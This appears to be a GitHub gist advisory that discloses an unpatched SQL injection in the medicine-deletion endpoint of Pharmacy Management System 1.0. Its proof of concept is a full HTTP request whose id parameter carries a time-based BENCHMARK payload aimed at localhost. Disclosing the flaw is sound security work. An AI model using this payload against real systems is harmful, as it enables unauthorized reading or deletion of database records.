Skip to content

Instantly share code, notes, and snippets.

@higordiego
Last active October 16, 2024 21:34
Show Gist options
  • Save higordiego/edd15afd508c51c95e5ce29544165320 to your computer and use it in GitHub Desktop.
Save higordiego/edd15afd508c51c95e5ce29544165320 to your computer and use it in GitHub Desktop.

Affected Version:

  • Pharmacy Management System: 1.0

Vulnerability Information:

  • Vulnerability Type: SQL Injection
  • Severity: CRITICAL
  • Status: Unpatched

Vulnerable Endpoint:

  • /php/manage_medicine.php?action=delete&id=1

Vulnerability Description:

A critical SQL injection vulnerability has been discovered in the Pharmacy Management System version 1.0, specifically in the medicine management deletion functionality. This flaw occurs when the id parameter, used to delete a medicine entry, is not properly sanitized. By manipulating this parameter through a GET request, attackers can inject and execute arbitrary SQL commands, compromising the security and integrity of the database.

If exploited, this vulnerability may allow unauthorized deletion of critical records, exposure of sensitive data, and disruption of essential operations. As no patch is available, this issue presents a severe risk and requires immediate action to prevent database corruption and system misuse.


Proof of Concept (PoC):

Below is an example of a GET request that demonstrates how the SQL injection vulnerability can be exploited by manipulating the id parameter:

GET /php/manage_medicine.php?action=delete&id=1%20AND%201084%3dBENCHMARK(5000000%2cMD5(0x5741704f)) HTTP/1.1
Host: localhost:8080
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
sec-ch-ua-mobile: ?0
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/manage_medicine.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f
Connection: keep-alive

Burp Suite Requests:

  • Burp Suite PoC

SQLMap Exploit:

  • SQLMap PoC

External Links:

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment